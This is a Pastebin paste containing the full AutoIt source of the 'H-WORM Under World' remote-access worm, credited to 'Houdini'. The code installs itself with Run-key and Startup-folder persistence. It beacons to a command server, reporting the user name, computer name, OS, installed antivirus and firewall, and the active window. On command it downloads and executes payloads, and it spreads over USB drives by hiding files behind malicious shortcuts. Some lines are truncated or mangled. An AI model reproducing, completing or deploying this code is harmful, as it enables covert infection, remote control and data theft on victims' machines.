Guest User

Untitled

a guest
Jul 2nd, 2013
2,476
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  2. H-WORM UNDER WORLD (AUTOIT VERSION) \
  3. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  4.  
  5. CODER:
  6. HOUDINI (C) - WWW.DEV-POINT.COM
  7.  
  8. COMPILED LANGUAGE:
  9. AUTOIT V 3.0
  10.  
  11. VISIT OWR FOR MORE INFO OR CONTACT ME IN:
  12. SKYPE: HOUDINI-FX
  13.  
  14. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  15.  
  16. # INCLUDE <PROCESS.AU3>
  17. # INCLUDE <WINAPI.AU3>
  18. # INCLUDE <FILE.AU3>
  19. # NOTRAYICON
  20.  
  21. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  22. WORM CONFIG
  23. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  24.  
  25. LOCAL $ IP_ADDR = "127.0.0.1"
  26. LOCAL $ PORT = "40055"
  27. LOCAL $ INSTALL_DIR = @ TEMPDIR
  28.  
  29.  
  30. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  31. WORM VARIABLE
  32. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  33.  
  34. LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
  35. LOCAL $ SPLITTER = "<|>"
  36. LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
  37. LOCAL $ USB_SPREADING = "FALSE"
  38. LOCAL $ SERVER_CMD
  39. LOCAL $ W_METUX
  40. LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
  41.  
  42.  
  43. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  44. WORM CODE: START
  45. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  46.  
  47. IF NOT @ COMPILED THEN EXIT
  48. __INIT ()
  49. WHILE TRUE
  50. __USB_SPREADING ()
  51. __STARTUP ()
  52. $ SERVER_CMD = __ POST ("I_AM_READY")
  53. $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
  54. SELECT
  55. CASE $ SERVER_CMD [1] = "UNINSTALL"
  56. CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
  57. __USB_SPREADING ($ SERVER_CMD [1])
  58. REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  59. REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  60. FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
  61. EXIT
  62. CASE $ SERVER_CMD [1] = "UPDATE"
  63. CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
  64. _WINAPI_CLOSEHANDLE ($ W_METUX)
  65. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
  66. EXIT
  67. CASE $ SERVER_CMD [1] = "SEND"
  68. CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
  69. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
  70. CASE $ SERVER_CMD [1] = "EXCECUTE"
  71. CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
  72. __RUNA3X ($ SERVER_CMD [2])
  73. ENDSELECT
  74. SLEEP (5000)
  75. WEND
  76.  
  77.  
  78. FUNC __ INIT ()
  79.  
  80. _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
  81. IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
  82. IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
  83. DO
  84. UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
  85. ELSE
  86. FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
  87. ENDIF
  88. SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
  89. EXIT
  90. ENDIF
  91. __ONE_INSTANCE ()
  92. __IS_USB_SPREADING ()
  93. ENDFUNC
  94.  
  95.  
  96.  
  97. FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
  98.  
  99. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  100. LOCAL $ FGET_HANDEL
  101.  
  102. _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  103. $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
  104. $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
  105. FILEWRITE ($ FGET_HANDEL, $ RESULT)
  106. FILECLOSE ($ FGET_HANDEL)
  107. IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
  108. RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
  109. ENDFUNC
  110.  
  111.  
  112.  
  113.  
  114. FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
  115.  
  116. LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
  117. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  118. LOCAL $ FGET_HANDEL
  119.  
  120. _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  121. FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
  122. $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
  123. $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
  124. DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
  125.  
  126. $ H_RESOURCE = DLLCALL
  127. IF $ H_RESOURCE [0] <> 0 THEN
  128. DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
  129. DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
  130. SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
  131. ENDIF
  132. ENDFUNC
  133.  
  134.  
  135.  
  136.  
  137. FUNC __ POST ($ DATA, $ TYPE = "TEXT")
  138.  
  139. LOCAL $ RESULT
  140.  
  141. HTTPSETUSERAGENT (__INFORMATIOM ())
  142. $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
  143. IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
  144. RETURN $ RESULT
  145. ENDFUNC
  146.  
  147.  
  148. FUNC __ STARTUP ()
  149.  
  150. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  151. REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  152. FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
  153. ENDFUNC
  154.  
  155.  
  156. FUNC __ INFORMATIOM ()
  157.  
  158. LOCAL $ INFORAMTION = ""
  159.  
  160. $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
  161. $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
  162. $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
  163. $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
  164. $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
  165. $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
  166. $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
  167. $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
  168. RETURN $ INFORAMTION
  169.  
  170. ENDFUNC
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. FUNC __ OPERATING_SYSTEM ()
  178.  
  179. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  180. LOCAL $ OS_CAPTION = ""
  181.  
  182. FOR $ OS IN $ OPERATINGSYSTEM
  183. $ OS_CAPTION = $ OS.CAPTION & "."
  184. EXITLOOP
  185. NEXT
  186. RETURN $ OS_CAPTION
  187. ENDFUNC
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. FUNC __ SECURITY_CENTER ()
  195.  
  196.  
  197. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  198. LOCAL $ OS_VERSION
  199. LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
  200.  
  201. FOR $ OS IN $ OPERATINGSYSTEM
  202. $ OS_VERSION = NUMBER ($ OS.VERSION)
  203. NEXT
  204. IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
  205. $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
  206.  
  207. LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
  208. LOCAL $ ANTI_VIRUSE = ""
  209. LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
  210. LOCAL $ FIRE_WALL = ""
  211.  
  212. FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
  213. $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
  214. NEXT
  215.  
  216. FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
  217. $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
  218. NEXT
  219.  
  220. IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
  221. IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
  222.  
  223. RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
  224. ENDFUNC
  225.  
  226.  
  227.  
  228.  
  229.  
  230. FUNC __ TOP_WINDOWS ()
  231.  
  232. LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
  233. LOCAL $ WINTOP_PID, $ WINTOP_PNAME
  234. _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
  235. $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
  236.  
  237. RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
  238. ENDFUNC
  239.  
  240.  
  241.  
  242.  
  243.  
  244. FUNC __ ONE_INSTANCE ()
  245.  
  246. $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
  247. IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
  248. ENDFUNC
  249.  
  250.  
  251.  
  252. FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
  253.  
  254. $ DISK = DRIVEGETDRIVE ("REMOVABLE")
  255. IF NOT ISARRAY ($ DISK) THEN RETURN
  256. FOR $ I = 1 TO $ DISK [0] STEP 1
  257. IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
  258. NEXT
  259.  
  260. ENDFUNC
  261.  
  262.  
  263.  
  264. FUNC __ IS_USB_SPREADING ()
  265.  
  266. LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
  267. $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
  268. IF $ USB_SPREADING = "" THEN
  269. $ USB_SPREADING = "FALSE"
  270. IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
  271. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
  272. ENDIF
  273. ENDFUNC
  274.  
  275.  
  276.  
  277. FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
  278.  
  279. LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
  280. LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
  281.  
  282. $ ENUM_ARRAY [0] = $ ROOT
  283. DO
  284. $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
  285. DO
  286. $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
  287. IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
  288. REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
  289. $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
  290. CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
  291. $ L_COUNTER + = 1
  292. ENDIF
  293. UNTIL @ ERROR OR $ FIND_NAME = ""
  294. FILECLOSE ($ H_SEARCH)
  295. IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
  296. $ G_COUNTER + = 1
  297. UNTIL $ G_COUNTER> $ L_COUNTER
  298. RETURN $ ENUM_ARRAY
  299. ENDFUNC
  300.  
  301.  
  302. FUNC __ CALLBACK ($ PATH, $ TYPE)
  303.  
  304. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
  305. _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  306.  
  307. IF $ TYPE = "INSTALL" THEN
  308. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
  309. FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
  310. FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
  311. $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
  312. IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
  313. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
  314. ELSE
  315. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
  316. ENDIF
  317. $ SZICON = STRINGSPLIT ($ SZICON, ",")
  318. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
  319. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
  320. IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
  321. FILESETATTRIB ($ PATH, "+ HS")
  322. ENDIF
  323. IF $ TYPE = "UNINSTALL" THEN
  324. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
  325. FILESETATTRIB ($ PATH, "-HS")
  326. ENDIF
  327.  
  328. ENDFUNC
  329.  
  330.  
  331. FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
  332.  
  333. LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
  334. IF (@ ERROR) OR (NOT $ RET [0]) THEN
  335. RETURN SETERROR (1, 0, 0)
  336. ENDIF
  337. RETURN $ RET [0]
  338. ENDFUNC
RAW Paste Data